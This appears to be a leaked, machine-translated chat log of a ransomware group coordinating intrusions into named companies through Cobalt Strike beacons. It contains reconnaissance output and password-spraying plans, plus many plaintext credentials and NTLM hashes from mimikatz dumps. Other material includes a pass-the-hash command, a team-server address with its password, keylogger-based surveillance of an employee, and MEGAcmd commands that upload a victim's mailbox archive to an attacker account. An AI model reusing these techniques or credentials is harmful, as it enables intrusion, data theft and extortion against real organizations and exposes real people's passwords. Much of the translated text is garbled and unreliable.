overnight let's leave the brute and inveiprobruted with passwords from luiza, run invei - something caught, but hashtag does not take ....sploites want password from sa. now it's brute force already with rockyou wordrebrute whining and sploit? yes, in general, everything is as it was. how are things going here? dimension::.::969615772484654CECA5175EAF959B4E:0101000000000000007193717096D601A59315971401D8FA0000 0000020016004400410054004100430045004E005400450052003200010016004400410054004100430045004E005400450 052003200040016006400610074006100630065006E007400650072003200030016006400610074006100630065006E0074 0065007200320007000800336BC76F7096D6010000000000000000 `````` [*] 10.20.4.0/24:445 - Scanned 256 of 256 hosts (100% complete) `````` [*] 10.20.4.0/24:445 - Error: 10.20.4.34: RubySMB::Error::CommunicationError Read timeout expired when reading from the Socket (timeout=30) ``````IUSR_MATCHES01::.::39B6178D9AF43DD5120EC1A45969D0E0:0101000000000000003739696C96D60178CAE898183A8D5 800000000020016004400410054004100430045004E005400450052003200010016004400410054004100430045004E0054 00450052003200040016006400610074006100630065006E007400650072003200030016006400610074006100630065006 E007400650072003200070008001F77B0686C96D601000000000000000000000000```` I'll try DomainPasswordSpray to see if I can change something does not the domain itself can be polled? yes, but we are not in the domainIt pings the local domain available and send it once LDA requests as if you just register the domain in smbautobrute it does not cling to this domain?but domain users will not be collected so we can also look towards python utilities various times we have a context with the dedication is slow and does not collect domain users if there is visibility on the smb - then the best option here is probably smb_login module metasploitau us dedik not in the domain, and want to go through all networks domain with all domain users and the dictionary why? 
@tl2 Is there any password spray tool where you can manually specify the LDAP server address?

```
User1-1 beacon> shell nslookup matchesfashion.com
[*] Tasked beacon to run: nslookup matchesfashion.com
[+] host called home, sent: 58 bytes
[+] received output:
Non-authoritative answer:
Server:  UnKnown
Address:  fdb0:64:3df8:0:7e4c:a5ff:fef9:c2a0

Name:    matchesfashion.com.matches.com
Address:  204.74.99.100
```

```
User1-1 beacon> shell arp -a
[*] Tasked beacon to run: arp -a
[+] host called home, sent: 37 bytes
[+] received output:

Interface: 192.168.0.80 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           7c-4c-a5-f9-c2-a0     dynamic
  192.168.0.15          a4-77-33-15-41-a0     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.2             01-00-5e-00-00-02     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  224.0.0.253           01-00-5e-00-00-fd     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
```

FortiNet

```
User1-2 beacon> shell type setting.ini
[*] Tasked beacon to run: type setting.ini
[+] host called home, sent: 47 bytes
[+] received output:
[CONFIG]
CATEGORY=BROWSER;OFFICE;PDF;JAVA;MISC
[TRACK]
BROWSER=firefox.exe;chrome.exe;iexplore.exe;opera.exe;plugin-container.exe;opera_plugin_wrapper.exe;opera_plugin_wrapper_32.exe;FlashPlayerPlugin_*.exe
OFFICE=powerpnt.exe;winword.exe;excel.exe;EQNEDT32.exe
PDF=acrord32.exe;acrobat.exe;foxit reader.exe
JAVA=java.exe;javaw.exe;javaws.exe
MISC=helpctr.exe;hh.exe;wscript.exe;winhlp32.exe;loaddll.exe
[DANGEROUS]
BROWSER=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
OFFICE=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
PDF=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
JAVA=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
MISC=powershell.exe;net.exe;regsvr32.exe
[PROTECTION]
FLAGS=0
[REACTION]
MODE=0
[DESCRIPTIONS]
firefox.exe=Mozilla Firefox
chrome.exe=Google Chrome
iexplore.exe=Internet Explorer
opera.exe=Opera Internet Browser
plugin-container.exe=Plugin Container for Firefox
opera_plugin_wrapper.exe=Opera Internet Browser Plugin Wrapper
opera_plugin_wrapper_32.exe=Opera Internet Browser Plugin Wrapper (32 bit)
FlashPlayerPlugin_*.exe=Adobe Flash Player Plugin
powerpnt.exe=Microsoft PowerPoint
winword.exe=Microsoft Word
excel.exe=Microsoft Excel
acrord32.exe=Adobe Acrobat Reader
acrobat.exe=Adobe Acrobat
foxit reader.exe=Foxit Reader
java.exe=Java Platform SE
javaw.exe=Java Platform SE
javaws.exe=Java Web Start Launcher
helpctr.exe=Microsoft Help and Support Center
hh.exe=Microsoft HTML Help Executable
wscript.exe=Microsoft Windows Based Script Host
winhlp32.exe=Windows Help
loaddll.exe=LoadDll
cscript.exe=Microsoft Console Based Script Host
powershell.exe=Windows Powershell
net.exe=Windows Net Command
regsvr32.exe=Microsoft Register Server
cmd.exe=Windows Command Processor
dw20.exe=Microsoft Application Error Reporting
eqnedt32.exe=Microsoft Equation Editor
```

```
User1-2 beacon> shell route print -4
[*] Tasked beacon to run: route print -4
[+] host called home, sent: 45 bytes
[+] received output:
===========================================================================
Interface List
 10...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter
 14...00 68 eb 67 1a a2 ......Intel(R) Ethernet Connection (6) I219-V
 22...04 ed 33 e4 5f 2b ......Microsoft Wi-Fi Direct Virtual Adapter
  7...06 ed 33 e4 5f 2a ......Microsoft Wi-Fi Direct Virtual Adapter #2
 18...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30)
 11...04 ed 33 e4 5f 2a ......Intel(R) Wi-Fi 6 AX200 160MHz
  1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.0.1     192.168.0.80     50
```
127.0.0.0.0 255.0.0 On-link 127.0.0.1 331 127.0.0.1 255.255.255.255.255 On-link 127.0.0.1 331 127.255.255.255.255.255.255.255 On-link 127.0.0.1 331 192.168.0.0 255.255.255.0 On-link 192.168.0.80 306 192.168.0.80 255.255.255.255.255 On-link 192.168.0.80 306 192.168.0.255 255.255.255.255 On-link 192.168.0.80 306 224.0.0.0.0 240.0.0.0 On-link 127.0.0.1 331 224.0.0.0.0 240.0.0.0 On-link 192.168.0.80 306 255.255.255.255.255.255.255.255 On-link 127.0.0.1 331 255.255.255.255.255.255.255.255 On-link 192.168.0.80 306 =========================================================================== Persistent Routes: None `````` User1-2 beacon> shell net share [*] Tasked beacon to run: net share [+] host called home, sent: 40 bytes [+] received output: Share name Resource Remark ------------------------------------------------------------------------------- C$ C:\ Default share IPC$ Remote IPC ADMIN$ C:\windows Remote Admin The command completed successfully. The ``pinged sql-keys ``` AWS-VTBCSQL01.matches.com [10.7.19.25] EC2AMAZ-U49LCLF.matches.com [10.1.4.4] AWS-VTBIMSTRI03.matches.com [10.7.18.36] ``OK.'' Then I suggest the following: - try to connect it to the wpn - gather from ad_comps list all the mssql servers and try sa account or try to solidify the dedicata would be fun and turn on the vpn at this point also, how do you connect? well yesterday the keylogger showed that she went to netflix to see idletimea for example by timea how do you determine?so she didn't notice any abnormal activity. the important thing is to log in when she's not there. so the point is to log in to her pc under her access and enable yourself some wpn on some other machines. did you try to connect to the dc? did you try to get her in the remote dc group? adfind did not work. did you get it off with a turn-by-turn info? did you get it off on all the dc's? ``` M@tches2020! M@tches2020! M@tches2020 Matches2014 matches123 matches123! matches123!!! m@tches123 m@tches123! m@tches123!!! Matches123! 
Matches123! Matches123!!! M@tches123 M@tches123! M@tches123! tried yesterday tried if she is asleep now you can go to her on the rdp and connect to the domain can try it on YES polzakov with a limit on the number of attemptsdid you get a dictionary for brute force in the process? and brute what? and her computer in the domaine pk also not in the domain as an option to try brutePo no information on the connection console6+she has a new version?she seems to connect when she needs access to network drives for the old version we know ... can you check if the user is not currently connected to the console version you do not know? we have a tunnel through the VPN to the subnet from where you can access the DC. But we can not do anything well from the fact that our computer is not in the domain. Plus the user is not an administrator. Inveeem also can not catch anything. In addition there are balls available to write. Yesterday we wanted to replace the labels in them, but not yet - not sure that the idea is good. In general, the situation so far stalemate. Maybe there is a solution, where to go in such a situation? 
```
svc_egnyteelc
sccmadmin
svc_ntbackup
Jacquesv.adm
georger.adm
sev_eset
svc_becrypt
OktaService
Karlns.adm
eo.adm
svc_admonitor
MSSQLSvc
```

We should have at least some kind of feedback on the networks, which are closed and which are not, so there would be no such situations, given that we now know there are bonuses for closed networks. For 2 networks there were definitely bonuses, I remember it. We had a few bonuses after training and one before January; when I asked what the bonus was for, the answer was "for a good mood". I think I said that one was... I was told that you had bonuses for closed nets, plus one more. @tl1 please add me in `sccy.com`. No screw-ups, so let's go hard on quality; in the end everyone comes out ahead, so do it right the first time. We don't do anything offline. It's not a fact that there were no offline backups; everything was rolled back. And if we finish on the second try? Well, let's just say successful = a network with no failures, completely paralyzed. The question of bonuses will be resolved today. Now more motivated. Today I personally vouch for the bonuses on successfully closed nets; draw a line. The answer is always the same! What I was given, I handed out. The question is for him; that is your own initiative that nobody knows about but you. The offices got it; we'll be more vigilant and make more effort, I hope our efforts won't go unnoticed. Or wait, I got 2 or 3 thousand more than the others that month, but I spent it on work and gasoline for 4. Who promised? Let's say they promised me a bonus for the forum; I gave up 3 days off doing the forum.
i got nothingwhen there should be at least 2 let's say even 1 so is 1 prize a reason to say that they have? about bonuses the question is open i also remember it, but @user3 maybe not thim lidovna but you who did not congratulate?) the new year was not even congratulated before january recently have not fucking closed if i'm right probably will come to you now specify about bonuses or we fucking have not closed?Where are they? What bonuses? Seriously? This is the first time we've heard, I honestly don't understand. you get bonuses for successfully closed networks. don't you need them? hello there, what are we working on? good nightbz tomorrow by 4 more hour work in #ballymoregroup-com turned off the VPN, it was not found, other machines could not get then helped in #sccy-com jumped on the cars, where they sit guys who in theory go to the nas - deaf, the creeds from them in the search. Username : dcha Domain : RTPCO Password : 11Saundra ``ESXi outside domains ``` Name : esxicrockett1.us.alloypolymers.com esxicrockett2.us.alloypolymers.com esxifrance1.rtpco.local esxifrance2.rtpco.local esxihend1.rtpco.local esxiindy1.rtpco.local esxiindy2.rtpco.local esximanage.rtpco.local esximanage2.rtpco.local esximexico2.rtpco.local esximn1.rtpco.local esximn2.rtpco.local esximn3.rtpco.local esximn4.rtpco.local esximn5.rtpco.local esximnrp1.rtpco.local esximnrp2.rtpco.local esxiohio1.rtpco.local esxiohio2.rtpco.local esxiorange1.us.alloypolymers.com esxiorange2.us.alloypolymers.com esxipoland1.rtpco.local esxipoland2.rtpco.local esxiredwing1.rtpco.local esxiredwing2.rtpco.local esxisg1.rtpco.local esxisg2.rtpco.local esxishenzhen1.rtpco.local esxishenzhen2.rtpco.local esxisuzhou1.rtpco.local esxisuzhou2.rtpco.local esxitexas1.rtpco.local esxitexas2.rtpco.local esxiva1.rtpco.local esxiva2.rtpco.local ``` And creeds for them ``` Username : root Password : dropCod5 `````` Username : bstangea Domain : RTPCO Password : pL@yTyme! 
Username : AXSQLSERVC Domain : WINONA Password : gg5bvq Username : tmusta Domain : RTPCO Password : 27Singapore Username : cwwestby Domain : RTPCO Password : Plastics16 Username : marcom Domain : RTPCO Password : Rtp5802023! Username : jesmith Domain : RTPCO Password : Nascar1020 Username : jmierau Domain : RTPCO Password : 3Brian4Becky Username : corr Domain : RTPCO Password : 00sthomas, Username : pvcimpro Domain : RTPCO Password : 4qbuyh Username : dpflughoeft Domain : RTPCO Password : BabyYoda123 Username : mmohr Domain : RTPCO Password : Welcome123 Username : AxAdmin Domain : RTPCO Password : gg5bvq Username : WINONA\Administrator Domain : WINONA\Administrator Password : DA7PaM8h Username : lmiller Domain : RTPCO Password : 2101Ronnie ``rtp ``` >memberOf : CN=VEEAMAdmins bbuerck ``` ``` >memberOf: CN=VEEAMUsers dch wstange ``` ``` >sAMAccountName: veeam_service >sAMAccountName: vmbackup ``.Passed in both trusts (in alloy to server, in winona to dk) ``` pth rtpco\vmbackup 2212f99d3c73ac885850545c544072af ``` YES to alloy. ``` * Username : wstangea * Domain : ALLOY * NTLM : 652805d304727fa73d6c4c7cfef31986 * Username : wstangea * Domain : us.alloypolymers.com * Password : Calib3r9 ``` ``` * Username : Administrator * Domain : ALLOY * NTLM : 66ac9a770e02cfdded6d5bd957a774fb ``alloy: ``` >dNSHostName : AlloyVM01.us.alloypolymers.com >operatingSystem: Windows Server 2003 Ping request could not find host AlloyVM01.us.alloypolymers.com. Please check the name and try again. ``` rtpco: ``` >operatingSystem: Windows Server 2012 R2 Standard >dNSHostName: HendVeeam.rtpco.local Ping statistics for 10.25.0.21: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >operatingSystem: Windows Server 2008 R2 Standard >dNSHostName: OHIOVEEAM.rtpco.local Destination host unreachable. 
Ping statistics for 10.1.10.9: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >operatingSystem: Windows Server 2012 R2 Standard >dNSHostName: INVeeam.rtpco.local Destination host unreachable. Ping statistics for 10.59.0.21: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: test-bs-vm.rtpco.local >operatingSystem: Windows Server 2019 Standard Ping statistics for 10.89.11.19: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >operatingSystem: Windows Server 2016 Standard >dNSHostName: nevadahypv1.rtpco.local Ping statistics for 10.57.2.233: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: Kaseya.rtpco.local >operatingSystem: Windows Server 2016 Datacenter Ping statistics for 10.89.11.24: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` winona: ``` >dNSHostName: Orion5.winona.rtpco.local >operatingSystem: Windows Server 2003 >memberOf: CN=Storage2_SQLBackups_RW Ping statistics for 89.0.191.194: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: AXDEV10.winona.rtpco.local >operatingSystem: Windows Server 2008 R2 Datacenter >memberOf: CN=Storage2_SQLBackups_RW Ping statistics for 10.89.0.61: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), ``` ``` >dNSHostName: AXSQL-TRN.winona.rtpco.local >operatingSystem: Windows Server 2008 R2 Standard >memberOf: CN=Storage2_SQLBackups_RW Ping statistics for 10.89.0.52: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: SuperOnContact.winona.rtpco.local >operatingSystem: Windows Server� 2008 Standard >memberOf: CN=Storage2_SQLBackups_RW Ping statistics for 89.0.0.33: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: AXSQL-PROD-OLD.winona.rtpco.local >operatingSystem: Windows Server 2008 R2 Enterprise >memberOf: CN=Storage2_SQLBackups_RW Ping statistics for 10.89.0.200: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: SQLSRV1.winona.rtpco.local 
>operatingSystem: Windows Server 2008 R2 Standard >memberOf: CN=Storage2_SQLBackups_RW Ping statistics for 89.0.0.121: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: vmwaremgr.winona.rtpco.local >operatingSystem: unknown Destination host unreachable. Ping statistics for 89.0.55.9: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), ``` ``` >dNSHostName: CitrixVM6.winona.rtpco.local >operatingSystem: Windows Server 2012 R2 Datacenter Ping statistics for 10.89.0.155: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: CitrixVM5.winona.rtpco.local >operatingSystem: Windows Server 2012 R2 Datacenter Ping statistics for 10.89.0.154: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: CitrixVM4.winona.rtpco.local >operatingSystem: Windows Server 2012 R2 Datacenter Ping statistics for 10.89.0.153: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: historianvm.winona.rtpco.local >operatingSystem: Windows Server 2003 Ping statistics for 89.0.192.96: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: CITRIXVM1.winona.rtpco.local >operatingSystem: Windows Server 2008 R2 Standard Ping statistics for 10.89.0.150: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: CITRIXVM2.winona.rtpco.local >operatingSystem: Windows Server 2008 R2 Standard Ping statistics for 10.89.0.151: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: CITRIXVM3.winona.rtpco.local >operatingSystem: Windows Server 2008 R2 Standard Ping statistics for 10.89.0.152: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: CITRIXVMONC2.winona.rtpco.local >operatingSystem: Windows Server 2008 R2 Datacenter Ping statistics for 10.89.0.161: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: CITRIXVMONC1.winona.rtpco.local >operatingSystem: Windows Server 2008 R2 Datacenter Ping statistics for 
10.89.0.160: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), `````` https://vmwaremgr.winona.rtpco.local https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local Name : Barracuda Orange Backup Server URL : http://10.1.8.14/auth/signin/ Name : Barracuda Crockett Backup Server URL : http://10.1.5.44/auth/signin/ Name : Barracuda Crockett Backup Server URL : http://10.1.5.34/auth/signin/ Name : Barracuda Backup RCH URL : http://10.1.1.14/auth/signin/ Name : ORG Barracuda Networks Login URL : http://10.1.8.232/web/login?_bcsp=1&_bceq=U2FsdGVkX1_ZQKJqbA-A6J1pDS0v348lRBF4gQRaT1Oos5iW-joM_MbMEGYcdA1LafroouYOUK8fDhjDdsOT4mCUAGvUboqz-KCiF9iyFEw. Name : CRT Barracuda Networks Login URL : http://10.1.5.180/web/login?_bcsp=1&_bceq=U2FsdGVkX1-zFQuAcSM8y3KXKFNCE-epeWxGww7gw37-3-IbBQlsFBC_6dk77rKf2OplTxoJjBY2xSAtaA0JEgq7yd9tbiBEUiNt-wZbBYo. 89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP ````GAPROC (null)```` List of domain trusts: 0: GAPROC (null) (Direct Outbound) (Direct Inbound) 1: RTPCO rtpco.local (Direct Outbound) (Direct Inbound) 2: ALLOY us.alloypolymers.com (Forest tree root) (Primary Domain) (Native) `````` alloy\Administrator 66ac9a770e02cfdded6d5bd957a774fb ``will do it, what would not be deleted 50 normal ? 
if your coba not deleted them usually 300 + how much slipshow goodnight clean files before tomorrow slipshow tomorrow as usual then finish for today joined user1, throw in the confab + I will help those who do not have sessions help those who have them write to him конфу@tl1HN.LOCAL Pomayu alexandruokne, still throw me a session in the slipstream may have a file with authorization or with the creed, maybe lucky you what do you mean by configs citrix?then you go out now looking for citrix configsx apparently yes@tl1 i think the machine is not in the domain at all+@tl1 i have a session hung up i took myself INTUNETEST, the domain does not show, as i gather the info i will write you.com those who do not have their networking confab write domains+will have something to work with if they fall off, if there are not taken - take away +++ have taken everything?losalna write the domains to make the confu da, starta I do not I do not I have no immediately do myself a spawn wait I have not + took one secws2 so far what 3 disassembled? yesok rephrase, where to turn off plugins? or you mean modules cna ?It turns out only 3 sessions as a option disable all plugins and then turn on, do not bother yet@tl1 In others hang open where can you check it?although there has been a minute timeout someone of you is a plugin that deletes "inactive" sessionsа where they disappear where have they gone? Where have sessions leftcreate a confab when your session reaches the coba check that arrives, if AV lab simply user1-9 without binding to the group * come in, choose a session, make a spawn in your coba, in the comment to the session, write what user took, I do confabobshak? 107.161.123.170:50050 DCYZLqYmoVxQj2ITcxQ8rXA5zkAttl ``Where are the objects while you have time to remember yesterday's material@tl1 We have datacenter2 so on rdp and won't let you in... Reboot it or something. Reply from 192.168.0.222: Destination host unreachable. Reply from 192.168.0.222: Destination host unreachable. 
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.

```
beacon> shell ping BOBXPS.waterway.com
[*] Tasked beacon to run: ping BOBXPS.waterway.com
[+] host called home, sent: 55 bytes
[+] received output:

Pinging BOBXPS.waterway.com [192.168.0.18] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.

Ping statistics for 192.168.0.18:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

beacon> shell ping BobsLaptop.waterway.com
[*] Tasked beacon to run: ping BobsLaptop.waterway.com
[+] host called home, sent: 59 bytes
[+] received output:

Pinging BobsLaptop.waterway.com [192.168.90.3] with 32 bytes of data:
Reply from 192.168.90.3: bytes=32 time=138ms TTL=127
Reply from 192.168.90.3: bytes=32 time=59ms TTL=127
Reply from 192.168.90.3: bytes=32 time=149ms TTL=127
Reply from 192.168.90.3: bytes=32 time=63ms TTL=127

Ping statistics for 192.168.90.3:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 59ms, Maximum = 149ms, Average = 102ms
```

```
beacon> shell dir \\192.168.90.3\D$
[*] Tasked beacon to run: dir \\192.168.90.3\D$
[+] host called home, sent: 52 bytes
[+] received output:
The network path was not found.

beacon> shell dir \\192.168.0.18\C$
[*] Tasked beacon to run: dir \\192.168.0.18\C$
[+] host called home, sent: 52 bytes
[+] received output:
The network path was not found.
```

```
beacon> shell wmic /node:192.168.90.3 logicaldisk get description,name
[*] Tasked beacon to run: wmic /node:192.168.90.3 logicaldisk get description,name
[+] host called home, sent: 87 bytes
[+] received output:
Node - 192.168.90.3
ERROR:
Description = The RPC server is unavailable.
```
beacon> shell wmic /node:192.168.0.18 logicaldisk get description,name [*] Tasked beacon to run: wmic /node:192.168.0.18 logicaldisk get description,name [+] host called home, sent: 87 bytes [+] received output: Node - 192.168.0.18 ERROR: Description = The RPC server is unavailable. ``I wanted to clarify it tooBobsLaptopBOBXPS( ``` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe Bob Administrator 1853Gators [*] Tasked beacon to run .NET program: SharpSniper.exe Bob Administrator 1853Gators [+] host called home, sent: 113763 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. In fact, only he left>name: Bob Dubinsky from here `CN=IT `let's look into the other technareim I think they made for their admins left-handed users So have written that have tried all YES with and without the domain and with different variations of passwords) pancake need to try nimblewhere ?there everything is clean there i checked the centers and vmvar was not seen except for the link in the browser in the doc that i threw a long time ago showed the settings nimbles are associated with hypervisors no or vmvarevcentronu and what virtualization center are you talking about?)hypervisor)is that even what? on the one I threw vmvare - empty there can be access to the disk with snapshots from nimblau nimblau have the ability to integrate into such things blauer you do not have go to the center of virualization is it on the technicians? https://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_Windows_Integration_Guide_NWT_5_0_0.whz/wmt1480648506910.html ``just in case i also tried root:root have you triedadmin:admin? 
``` >operatingSystem: Hyper-V Server ``there's only something like this ``` >description: Failover cluster virtual network name account ``` ``` >servicePrincipalName: Microsoft Virtual System Migration Service/WWHV01 >servicePrincipalName: Microsoft Virtual System Migration Service/WWHV01.waterway.com >servicePrincipalName: Microsoft Virtual Console Service/WWHV01 >servicePrincipalName: Microsoft Virtual Console Service/WWHV01.waterway.com >servicePrincipalName: Microsoft Virtual Console Service/WWHV01 waterway. URL : https://store.vmware.com/store/ Username : mharper@waterway.com Password : 1Vanilla2 ``` there is such you have found in vcenter? on request goyya in slack found only access on wwsql-messages much and searches dolnoosch to push? at mail on Root and with different variations of clears that found already and with @ and through slash tried[ ](https://mediaeveryone.com/group/waterway-com?msg=q9dxQCkFZ5u9xASRH) them it seems the first checkA with domains on nimbel do not roll?)ah, well there empty I just see that in the dashboard are also esks, you can not look :) what? esksynu did not anything interesting? then check the rest of the grouppusto there in ncentral is a group eskha suddenly too fast beacon?) nothing there beaconednu and screenshots along the way did I do so ``` shell start /b MEGAcmdServer.exe shell MEGAclient.exe login ``[ ](https://mediaeveryone.com/group/waterway-com?msg=MaLx72xmqbWiJ5J58) just now saw) no. not so. 
through execute192.168.0.254 and then in the psentrall let's run with the domains their passwords with root what is thereDid everyone try the admin account?[ ](https://mediaeveryone.com/group/waterway-com?msg=QC5rcecgmouaadQh7) -tied!!!yes, binding to the domain and should specify the domain or Rootmb domain?or take their mailboxes and delete the message about successful authorization from all of us wait until they leavetwo variatudes, already found the creeds[ ](https://mediaeveryone.com/group/waterway-com?msg=gqZeK3Fm7KJkoQg4H).okeytak more beautifula what is it for? `WATERWAY\djarden MyNewPassword6 ``why I concluded that this local ipacot where I throw the sock gets to vvdk2 and when connected there by rds dedik` `` C:\Users\Administrator>ping -n 1 127.0.1.1 Pinging 127.0.1.1 with 32 bytes of data: Reply from 127.0.1.1: bytes=32 time<1ms TTL=128 Ping statistics for 127.0.1.1: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: ``with dk2''. beacon> shell ping -a -n 1 127.0.1.1 [*] Tasked beacon to run: ping -a -n 1 127.0.1.1 [+] host called home, sent: 53 bytes [+] received output: Pinging 127.0.1.1 with 32 bytes of data: Reply from 127.0.1.1: bytes=32 time<1ms TTL=128 Ping statistics for 127.0.1.1: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ```+ ``` * Username : djarden * Domain : WATERWAY * Password : MyNewPassword6 ``Yes, that's why there's no union on any host under creeds``. 
* Username : djarden@waterway.com * Domain : (null) * Password : DJarden6 `````` msv : [00000003] Primary * Username : djarden * Domain : WATERWAY * NTLM : 8c7ce287451c3bbd94b08733f0d4f8d7 * SHA1 : d5ee0ca5701d49cd73ffe72244bc481fbecf29e6 * DPAPI : 8b55a307cd3193b311053ee63498ecda tspkg : * Username : djarden * Domain : WATERWAY * Password : MyNewPassword6 ``logon from winlogon request or browser history if not, then logonpasswordsdetermine hash first check it win10? is there a session there? do I have a netego clear pass?[ ](https://mediaeveryone.com/group/waterway-com?msg=ktF5emnAqvxCPLyA7) relatively fresh...[ ](https://mediaeveryone.com/group/waterway-com?msg=6fjrvSMLTyH4ABN4i) on ip 127....04/25/2019 09:51:35 AMDate of message?check your mail...and it's mostly requests for changeover password 200+ results[ ](https://mediaeveryone.com/group/waterway-com?msg=nWZSfPGBEWbrKpQGC) here's tacoenu useless info there[ ](https://mediaeveryone.com/group/waterway-com?msg=YJ8DGBmfEcKZKN9TA) 1there's mostly tacoenu by nimble did you search only by ip? beacon> shell ping -a 192.168.0.75 [*] Tasked beacon to run: ping -a 192.168.0.75 [+] host called home, sent: 51 bytes [+] received output: Pinging nimble-group1.waterway.com [192.168.0.75] with 32 bytes of data: Reply from 192.168.0.75: bytes=32 time<1ms TTL=64 Reply from 192.168.0.75: bytes=32 time<1ms TTL=64 Reply from 192.168.0.75: bytes=32 time<1ms TTL=64 Reply from 192.168.0.75: bytes=32 time<1ms TTL=64 Ping statistics for 192.168.0.75: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ``And the host is called something else and I don't think it's a group without a domain. nimble-group1.waterway.com nimble...did you check the hostname? 2 years ago it was the same but we tried to check harper's access or you mean rdcheck my mail? 
if harper's online should i check it but i don't know if it's192.168.0.If he's not online, should he check on his desktop? I think he has notes on the desktop where he may have access ... screenshot of the desktop ... in processes only if he does not have a dropbox hanging in his browser SauronEye.exe -d C: D: G: Q: -c 192.168.0.43 -f .* -s ``okay later let's have a look, I think the sauron setting is wrong, don't find it in the dj === SauronEye === Directories to search: C:, D:, G:, Q:, password, nimble, pwd For file types: .* Containing: Search contents: True Search Office 2003 files for VBA: False Max file size: 1024 KB Search Program Files directories: True Searching in parallel: C: Searching in parallel: G: Searching in parallel: D: Searching in parallel: Q: Searching in parallel: password Searching in parallel: nimble Searching in parallel: pwd [*] Done searching file system, now searching contents [*] Done searching file system, now searching contents Done. Time elapsed = 00:00:00.0388757 have you tried sauron? have you downloaded it? beacon> shell start /b MEGAcmdServer.exe [*] Tasked beacon to run: start /b MEGAcmdServer.exe [+] host called home, sent: 57 bytes ``` ``` beacon> shell MEGAclient.exe update --auto=off [*] Tasked beacon to run: MEGAclient.exe update --auto=off [+] host called home, sent: 63 bytes [+] received output: ------------------------------------------------------------------------------- | ENABLING AUTOUPDATE BY DEFAULT. 
You can disable it with "update --auto=off" | ------------------------------------------------------------------------------- Automatic updates disabled ``` ``` beacon> shell MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd [*] Tasked beacon to run: MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd [+] host called home, sent: 98 bytes [+] received output: ------------------------------------------------------ | Our revised Terms of Service, Privacy and Data Policy, and Takedown Guidance | | Policy apply from January 18th 2021 | | View Terms: https://mega.nz/updatedterms | | Execute "psa --discard" to stop seeing this message | ------------------------------------------------------------------------------- ``` ``` beacon> shell MEGAclient.exe whoami [*] Tasked beacon to run: MEGAclient.exe whoami [+] host called home, sent: 52 bytes [+] received output: Account e-mail: jyszkivtedxvrqbbit@upived.online ``` ``` beacon> shell MEGAclient.exe put -q --ignore-quota-warn "C:\Users\Djarden\Documents\Outlook Files\ol.7z" [*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn "C:\Users\Djarden\Documents\Outlook Files\ol.7z" [+] host called home, sent: 121 bytes ``Well, that's how it turns out that the computer's been lagging so badly!`` ``` 3) Start background MEGAcmdServer.exe ``` it turns out: ``` shell start /b MEGAcmdServer.exe ``` and go Or I just do conditionally ``` shell MEGAclient.exe login .... ``` and it's ok? why? 1) Create folder for files 2) Uploads exe and dll files to created folder ``Read the guide 